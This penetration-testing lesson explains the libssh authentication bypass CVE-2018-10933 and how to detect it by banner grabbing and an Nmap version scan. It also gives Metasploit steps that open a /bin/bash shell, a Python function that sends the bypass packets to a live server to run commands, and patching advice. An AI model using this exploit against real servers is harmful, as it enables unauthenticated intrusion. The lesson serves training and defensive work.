November 13, 2020
Penetration Testing Lesson: LIBSSH Auth Bypass aka CVE-2018-10933
LIBSSH Auth Bypass CVE-2018-10933 Lab Files: https://cydeferepo.s3.ca-central-1.amazonaws.com/libSSH.rar
What is it?:
libssh servers built on versions 0.6.0 through 0.8.3 have an authentication bypass that lets an attacker open channels without ever authenticating. After key exchange, the server expects the client to start authentication with an SSH2_MSG_USERAUTH_REQUEST message. If the client instead sends SSH2_MSG_USERAUTH_SUCCESS, the message a server uses to tell a client that authentication succeeded, a vulnerable libssh server records the session as authenticated without checking any credentials. The bug is in libssh's server side only: applications that embed libssh as an SSH server are affected, while the libssh client and OpenSSH (which does not use libssh) are not.
To identify this vulnerability, we can use two tools already installed on Kali. The first is netcat, a networking utility for reading from and writing to TCP or UDP connections. The second is Nmap, a network scanner that discovers hosts and services by sending packets and analyzing the responses. We will cover netcat first.
To use netcat for discovering the libssh authentication bypass, we connect to a port serving the libssh software and read the information the server sends back. Connecting to a service and reading what it sends is known as banner grabbing. To perform a banner grab with netcat, use the syntax "nc -nv IP port". The -n option tells netcat not to perform a DNS lookup, and the -v option tells netcat to give verbose output, including whether the connection succeeded.
Image 1.1 shows netcat performing a banner grab against a target running SSH on port 22. The server identifies itself as libSSH 0.8.1, which puts it inside the affected range. If the banner reports libSSH 0.6.0 - 0.6.5, 0.7.0 - 0.7.5, or 0.8.0 - 0.8.3, there is a high probability the machine can be exploited. Treat the banner as a lead rather than proof: it is just a string the server chooses to send, a distribution may have backported the fix without changing it, and only a successful bypass confirms the vulnerability.
The next tool we will use to identify the vulnerability is Nmap. With Nmap we run a service version scan and a banner grab together to determine the server version. Why both? Network conditions can cause a version probe to return incomplete or incorrect results; grabbing the raw banner alongside the scan lets you check that the reported version is genuine.
To perform a banner grab and service version scan against port 22 of a target, use the syntax "nmap -p 22 -sV --script=banner IP". The -p option restricts the scan to a specific port rather than the default port range. The -sV option tells Nmap to probe the specified port to determine its service and version. Finally, the --script option tells Nmap to run a specific Nmap Scripting Engine (NSE) script, here the banner script. Image 1.2 shows the results of running this command.
As image 1.2 shows, both the Nmap banner script and the service scan have identified the SSH server as libSSH 0.8.1. Using Nmap and netcat, we have established a high probability that this machine is vulnerable to CVE-2018-10933. You may be asking yourself, what is the next step? Well, it's time for some exploitation!
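The version check behind the netcat and Nmap steps above, as an added example that is not code from this post, libssh or Nmap: it parses an SSH identification string, extracts a libssh version, and compares it against the affected ranges listed above. The sample banners are constructed, and the assumption that libssh announces itself as "libssh_X.Y.Z" or "libssh-X.Y.Z" is mine; the grab_banner function does the network part of what "nc -nv IP port" does and is not needed for the offline demo.

```python
import re
import socket

# Affected libssh server versions as listed above: 0.6.0 - 0.6.5, 0.7.0 - 0.7.5
# and 0.8.0 - 0.8.3. Releases 0.7.6 and 0.8.4 carry the fix.
VULNERABLE_RANGES = (
    ((0, 6, 0), (0, 6, 5)),
    ((0, 7, 0), (0, 7, 5)),
    ((0, 8, 0), (0, 8, 3)),
)

# SSH identification string (RFC 4253, section 4.2):
#   SSH-protoversion-softwareversion SP comments CR LF
BANNER_RE = re.compile(r"^SSH-(?P<proto>[^-]+)-(?P<software>\S+)(?: (?P<comments>.*))?$")


def parse_banner(raw):
    """Split a raw banner into (protoversion, softwareversion, comments).

    Returns None when the first line is not an SSH identification string,
    e.g. when the port turns out to serve something other than SSH.
    """
    first_line = raw.split(b"\n", 1)[0].rstrip(b"\r")
    match = BANNER_RE.match(first_line.decode("ascii", "replace"))
    if match is None:
        return None
    return match.group("proto"), match.group("software"), match.group("comments")


def libssh_version(software):
    """Return (major, minor, patch) for a libssh softwareversion, else None.

    Assumption: libssh announces itself as 'libssh_X.Y.Z' or 'libssh-X.Y.Z';
    anything else (OpenSSH, Dropbear, ...) is reported as not libssh.
    """
    match = re.match(r"^libssh[_-](\d+)\.(\d+)\.(\d+)", software, re.IGNORECASE)
    if match is None:
        return None
    return tuple(int(part) for part in match.groups())


def likely_vulnerable(raw_banner):
    """True when the banner names a libssh version inside an affected range.

    A True result is a lead, not proof: the string is under the server's
    control and distributions may backport the fix without changing it.
    """
    parsed = parse_banner(raw_banner)
    if parsed is None:
        return False
    version = libssh_version(parsed[1])
    if version is None:
        return False
    return any(low <= version <= high for low, high in VULNERABLE_RANGES)


def grab_banner(host, port=22, timeout=5.0):
    """Do what 'nc -nv host port' does: connect and read the server's banner."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        return sock.recv(256)


if __name__ == "__main__":
    # Constructed sample banners; no network access is needed for this demo.
    for banner in (b"SSH-2.0-libssh_0.8.1\r\n",
                   b"SSH-2.0-libssh_0.8.4\r\n",
                   b"SSH-2.0-OpenSSH_7.9p1 Debian-10\r\n"):
        print(banner.strip().decode(), "->", likely_vulnerable(banner))
```

To use it against a lab host, pass the bytes returned by grab_banner(target) to likely_vulnerable; a non-SSH banner or an OpenSSH banner simply yields False rather than an error.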
For this first lesson, we will exploit the vulnerability with Metasploit; later lessons will cover more complex ways of exploiting a target. To exploit CVE-2018-10933, we will use an auxiliary module that ships with Metasploit. To use the module, we first need its path so we can select it as the active module. Finding this is done by running the search command with the term libssh. Image 1.3 shows the search command and its results: Metasploit reports one module we can use, auxiliary/scanner/ssh/libssh_auth_bypass.
After we have identified our module, we need to make it active and set any required options. To make the module active, run "use auxiliary/scanner/ssh/libssh_auth_bypass", which tells Metasploit this is the module we wish to use. As image 1.3 shows, the console prompt then changes to "auxiliary(scanner/ssh/libssh_auth_bypass)" to indicate the module is active.
To see which options the module needs, run the "show options" command; for this module it returns a short list. The first option to set is "RHOSTS", the target: run "set rhosts Target", replacing Target with the target's IP address or hostname. The second is "CMD", the command the module runs on the target through the unauthenticated channel; set it to a shell with "set cmd /bin/bash" (note the leading slash, the path must be absolute) so that the resulting session is an interactive shell. Once this is done, run the module by typing "run" in the console and pressing enter. Image 1.4 shows the "RHOSTS" and "CMD" options being set and the module being run.
Image 1.4 shows that after running the module we are told a command shell session has opened, but we are not dropped into it. To interact with the new shell, type "sessions" to list the currently active sessions. In the list shown in image 1.4 there is a session with an ID of 1; typing "sessions -i 1" attaches us to that shell. Congratulations, if you have been following along with the VM you have successfully identified and exploited CVE-2018-10933. HACK THE PLANET!
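The exchange the Metasploit module drives, as an added example that is not code from this post, from libssh or from Metasploit: a small Python model of a libssh-style server with the flaw switchable on and off, the client's two messages (USERAUTH_SUCCESS, then CHANNEL_OPEN) against both the vulnerable and the fixed behaviour, and a function that sends the same packets to a live server with paramiko, following the public proof of concept. The ToyServer class, the credentials and the transcript format are assumptions for illustration; only the message numbers come from the RFCs.

```python
# Message numbers from RFC 4252 (authentication) and RFC 4254 (channels).
SSH2_MSG_USERAUTH_REQUEST = 50
SSH2_MSG_USERAUTH_FAILURE = 51
SSH2_MSG_USERAUTH_SUCCESS = 52
SSH2_MSG_CHANNEL_OPEN = 90
SSH2_MSG_CHANNEL_OPEN_CONFIRMATION = 91
SSH2_MSG_CHANNEL_OPEN_FAILURE = 92


class ProtocolError(Exception):
    """Raised where a real server would send SSH_MSG_DISCONNECT and drop the link."""


class ToyServer:
    """Post-key-exchange state of an SSH server, reduced to what the bug needs.

    This is a model for illustration, not libssh code. With
    accept_client_userauth_success=True it reproduces the flaw: the handler
    meant for the client side (record "I am authenticated" on USERAUTH_SUCCESS)
    is also active in server mode. With False it models the fixed behaviour,
    where a message a server should never receive is rejected.
    """

    def __init__(self, accept_client_userauth_success, valid_creds):
        self.accept_client_userauth_success = accept_client_userauth_success
        self.valid_creds = valid_creds          # {username: password}, constructed
        self.authenticated = False
        self.channels = []

    def handle(self, msg_type, payload=None):
        """Process one client packet; return the reply message number (or None)."""
        if msg_type == SSH2_MSG_USERAUTH_REQUEST:
            user, password = payload
            if self.valid_creds.get(user) == password:
                self.authenticated = True
                return SSH2_MSG_USERAUTH_SUCCESS
            return SSH2_MSG_USERAUTH_FAILURE
        if msg_type == SSH2_MSG_USERAUTH_SUCCESS:
            if self.accept_client_userauth_success:
                self.authenticated = True   # the bypass: no credentials were checked
                return None
            raise ProtocolError("USERAUTH_SUCCESS is only valid server-to-client")
        if msg_type == SSH2_MSG_CHANNEL_OPEN:
            if not self.authenticated:
                return SSH2_MSG_CHANNEL_OPEN_FAILURE
            self.channels.append(payload)
            return SSH2_MSG_CHANNEL_OPEN_CONFIRMATION
        raise ProtocolError("unexpected message %d" % msg_type)


def attempt_bypass(server, channel_type="session"):
    """Replay the CVE-2018-10933 exchange; return (transcript, channel_opened)."""
    transcript = [("client", SSH2_MSG_USERAUTH_SUCCESS)]   # instead of USERAUTH_REQUEST
    try:
        reply = server.handle(SSH2_MSG_USERAUTH_SUCCESS)
    except ProtocolError as err:
        transcript.append(("server", "DISCONNECT: %s" % err))
        return transcript, False
    if reply is not None:
        transcript.append(("server", reply))
    transcript.append(("client", SSH2_MSG_CHANNEL_OPEN))
    reply = server.handle(SSH2_MSG_CHANNEL_OPEN, channel_type)
    transcript.append(("server", reply))
    return transcript, reply == SSH2_MSG_CHANNEL_OPEN_CONFIRMATION


def exploit_with_paramiko(host, port, command, timeout=10):
    """Same exchange against a real server, following the public proof of concept.

    Needs paramiko (imported here so the offline model runs without it) and a
    reachable target, so the offline demo does not call it.
    """
    import socket
    import paramiko

    sock = socket.create_connection((host, port), timeout=timeout)
    transport = paramiko.Transport(sock)
    transport.start_client(timeout=timeout)            # banner and key exchange only
    msg = paramiko.Message()
    msg.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
    transport._send_message(msg)                       # private API: skips paramiko's own auth
    channel = transport.open_session(timeout=timeout)  # succeeds only if the server is vulnerable
    channel.exec_command(command)
    output = channel.makefile("rb", 2048).read()
    transport.close()
    return output


if __name__ == "__main__":
    for label, flawed in (("vulnerable", True), ("patched", False)):
        transcript, opened = attempt_bypass(ToyServer(flawed, {"root": "toor"}))
        print(label, "server, channel opened:", opened)
        for side, msg in transcript:
            print("   ", side, "->", msg)
```

The vulnerable model opens the channel after a single client packet and never consults valid_creds; the patched model disconnects on the first packet, and a normal USERAUTH_REQUEST with the right password still works against it. If you point exploit_with_paramiko at a patched libssh, open_session fails because the server is still waiting for authentication.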
To mitigate CVE-2018-10933, upgrade libssh to 0.8.4 or 0.7.6 (or later), the releases published at https://www.libssh.org/ to address this issue, or apply your distribution's patched package. Because libssh is a library, remember to update or rebuild every application that embeds it as an SSH server, in particular anything that links libssh statically, since a system-wide package update will not reach those copies.